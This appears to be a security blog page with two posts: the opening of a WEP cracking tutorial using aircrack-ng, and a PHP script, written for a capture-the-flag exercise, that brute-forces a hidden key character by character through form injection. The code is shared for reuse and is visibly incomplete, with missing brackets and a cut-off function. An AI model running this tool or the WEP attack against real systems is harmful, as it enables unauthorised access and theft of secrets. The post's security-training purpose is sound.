Wireless Attack: WEP

The following is a quick-hit list of commands for attacking a WEP wireless network. It assumes you are using a 2016 variant of Kali linux with the aircrack-ng suite installed and a wireless network card that can be placed into monitor mode (which should be about 100% of them). It also assumes that there is a WEP network with an associated client that is transmitting, and that you are running as a user with sufficient permissions to execute each of these commands.

For the sake of this tutorial the AP will be assumed to have a MAC address of “DE:AD:DE:AD:DE:AD” and the client will be assumed to have a MAC address of “BE:AD:ED:BE:AD:ED”. The wireless network card we will use will be assumed to be “wlan0”.

UPDATE 2017-01-01: If a presentation is more your style of learning you can access training on this topic here: Wireless Attacks – WEP (basic_0x00)

First up, boot up Kali and shut down any potentially interfering programs:

airmon-ng check kill

Continue reading “Wireless Attack: WEP”

Quick PHP Injector

Just posting this for anyone that may need something similar in the future.  The below is my quick code that I use to brute force/programmatically assess form injection.  I wrote it when working through (CTF NAME REDACTED).  If it helps, enjoy.  Please attribute appropriately if you repurpose it, however.

// Name: PHP-Injector-Template
// Author: Brian Mork (Hermit)
// Last Modified: 2016-04-08

// This version assumes basic authentication and POST method
$options = array(
     'http' => array(
          'header' => "Content-type: application/x-www-form-urlencodedrnAuthorization: Basic " . base64_encode("$leveluser:$levelpass"),
          'method' => 'POST',
          'content' => http_build_query($testpush)

// Build the context for the request using all of the above
$context = stream_context_create($options);

// Actually submit it
$result = file_get_contents($url, false, $context);

// Check for a failed connection state (just in case)
if ($result === FALSE) {
     print "Failed to connect\n\n";
} else {
// Look for "INDICATOR" which indicates successful injection and return based upon that...
     if (preg_match("/INDICATOR/", $result)) {
          return $trialdata;
     } else {
          return null;

// Zeroize the recovery key
$recoverkey = '';

// Build an array which is [A-Za-z0-9]
// Modify as appropriate for other use cases
$allchars = array_merge(range('A', 'Z'), range('a', 'z'), range(0, 9));

// List how many characters to limit the search to
$loopcount = 123;
// Loop through and test
foreach ( range(1, $loopcount) as $looper ) {
     $breakflag = 'FALSE';
     foreach( $allchars as $onechar) {
          // Bypass method to avoid unnecessary tries
          if ($breakflag === 'FALSE') {
               // We need to track the single character separately from the injection test
               // so the below builds the test portion
               $testkey = $recoverkey . $onechar;
               // Check it using the above function
               $poscheck = post_data($testkey);
               // If we didn't get null, it was good... let me know!
               if ($poscheck !== null) {
                    $breakflag = 'TRUE';
                    $recoverkey .= $onechar;
                    echo "\nFound new position! Current recovery is: " . $recoverkey . "\n";
               } else {
                    // I just like to see that it's still working
                    echo ".";

// Once we've reached the full number of characters, break and print the key
print "Found key of: " . $recoverkey . "\n\n";


Website Powered by WordPress.com.

Up ↑